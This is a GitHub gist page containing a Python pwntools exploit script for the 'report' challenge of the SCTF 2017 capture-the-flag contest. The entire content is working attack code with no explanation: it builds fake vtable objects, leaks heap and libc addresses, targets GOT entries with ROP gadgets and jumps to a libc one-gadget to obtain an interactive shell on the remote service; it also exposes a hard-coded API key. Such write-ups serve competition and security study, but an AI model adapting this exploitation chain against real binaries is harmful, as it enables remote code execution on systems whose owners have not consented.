Created
August 21, 2017 01:01
-
-
Save ujin5/b82d4a0f3c41519b92d11350c52b6dde to your computer and use it in GitHub Desktop.
sctf 2017 report writeups
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import json | |
| from ctypes import * | |
| REMOTE = 1 | |
| if REMOTE == 1: | |
| s = remote('report.eatpwnnosleep.com',55555) | |
| a = { | |
| 'apikey' : "e54aa9929975face3253fb6e261f3a7c15701dface66a5a63ac2fdea555e745d", | |
| } | |
| s.send(json.dumps(a).encode()) | |
| time.sleep(7) | |
| else : | |
| s = remote('192.168.100.39',1234) | |
| def delete(name): | |
| s.recvuntil('==>') | |
| s.sendline('2') | |
| s.recvuntil('==>') | |
| s.sendline(name) | |
| def todouble(s): | |
| cp = pointer(c_int(s)) # make this into a c integer | |
| fp = cast(cp, POINTER(c_double)) # cast the int pointer to a float pointer | |
| return fp.contents.value # dereference the pointer, get the float | |
| def add(types,name,credit,grade): | |
| s.recvuntil('==>') | |
| s.sendline('1') | |
| s.recvuntil('==>') | |
| s.sendline(str(types)) | |
| s.recvuntil('==>') | |
| s.sendline(name) | |
| s.recvuntil('==>') | |
| s.sendline(str(credit)) | |
| s.recvuntil('==>') | |
| s.sendline(str(grade)) | |
| gadget = [0x40013f,0x400177,0x4000b3,0x4009b4,0x4009cb,0x4001f8] | |
| gadget = [t-0x18 for t in gadget] | |
| offset = 0x36e6f8 - 0x2ecf0 | |
| magic_vtable = 0x0402118 - 0x8 | |
| leak_vtable = 0x04020E8 - 0x8 | |
| set_rax = 0x004020F8 - 0x8 | |
| free_got = 0x0602FC0 | |
| magic_rop = 0x400E82 | |
| k = 0x6031e0 | |
| dummy = 160 | |
| printf_got = 0x0602F78 | |
| add_18 = 0x4009b4 | |
| s.recvuntil('Input Teacher\'s Name ==>') | |
| s.sendline('A'*8) | |
| fake_object = p64(magic_vtable) + p64(k) | |
| fake_object += p64(set_rax) + p64(0)*3 + p64(free_got - 0x18) + p64(k - 0x18) + p64(0)*14 | |
| fake_object += p64(set_rax) + p64(0)*3 + p64(printf_got - 0x18) + p64(k - 0x18) | |
| fake_object += p64(gadget[0]) + p64(gadget[1])*3 + p64(gadget[2])*4 + p64(gadget[3]) + p64(gadget[4]) + p64(gadget[5]) | |
| fake_object += p64(0)*3 | |
| fake_object += p64(magic_vtable) + p64(k + 0x30) | |
| fake_object += p64(set_rax) + p64(0)*3 + p64(k+0x30-0x18) + p64(add_18-0x18)*2 + p64(0)*13 | |
| fake_object += p64(set_rax) + p64(0)*3 + p64(free_got - 0x18) + p64(k - 0x18) + p64(0)*14 | |
| fake_object += p64(leak_vtable) | |
| s.recvuntil('Input Student Profile ==>') | |
| s.sendline(fake_object) | |
| add(0,'1234',1,1) | |
| s.recvuntil('==>') | |
| s.sendline('3') | |
| s.recvuntil('AAAAAAAA') | |
| heap = u64(s.recv(4)+"\x00\x00\x00\x00") | |
| log.info("HEAP : 0x%x"%heap) | |
| add(1,"A",magic_vtable,todouble(heap + 0xc0)) | |
| add(1,"B",magic_vtable,todouble(0xdeadbeef)) | |
| add(1,"C",0xdeadbeef,todouble(0x00400C79)) | |
| delete('C') | |
| raw_input() | |
| log.info('HEAP : 0x%x'%heap) | |
| s.recvuntil('==>') | |
| s.sendline('4') | |
| s.recvuntil('==>') | |
| dat = p64(offset) + p64(heap+0x80) | |
| dat += p64(heap - 0x1010) | |
| dat += p64(heap - 0x1010 + 0x10) | |
| dat += p64(heap + 0x68) | |
| dat += p64(heap - 0x1010 + 0x10 + dummy) | |
| dat += p64(heap - 0x1010 + 0x10 + dummy + dummy) | |
| dat += p64(heap - 0x1010 + 0x10 + dummy + dummy + 0x8*2 + dummy) | |
| dat += p64(heap - 0x1010 + 0x10 + dummy + dummy + 0x8*2 + dummy + dummy) | |
| dat += p64(heap - 0x1010 + 0x10 + dummy + dummy + 0x8*2) | |
| dat += p64(heap + 0xb8) | |
| dat += "\x00" * (0x68 - len(dat)) | |
| s.sendline(dat) | |
| libc = u64(s.recvuntil('\x7f')[-6:]+'\x00\x00') - 0x3c67a8 | |
| log.info("LIBC : 0x%x"%libc) | |
| s.recvuntil('Input Teacher\'s Name ==>') | |
| s.sendline('A'*8) | |
| s.recvuntil('Input Student Profile ==>') | |
| fake_object = "KKKKK" | |
| fake_object = p64(magic_vtable) + p64(libc+0x3c67a8) | |
| s.sendline(fake_object) | |
| s.recvuntil('==>') | |
| s.sendline('4') | |
| s.recvuntil('==>') | |
| dat = p64(libc+0x4526a) | |
| dat += p64(0) | |
| dat += p64(heap+0xf0) | |
| dat += '\x00'*(0x68-len(dat)) | |
| s.sendline(dat) | |
| s.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment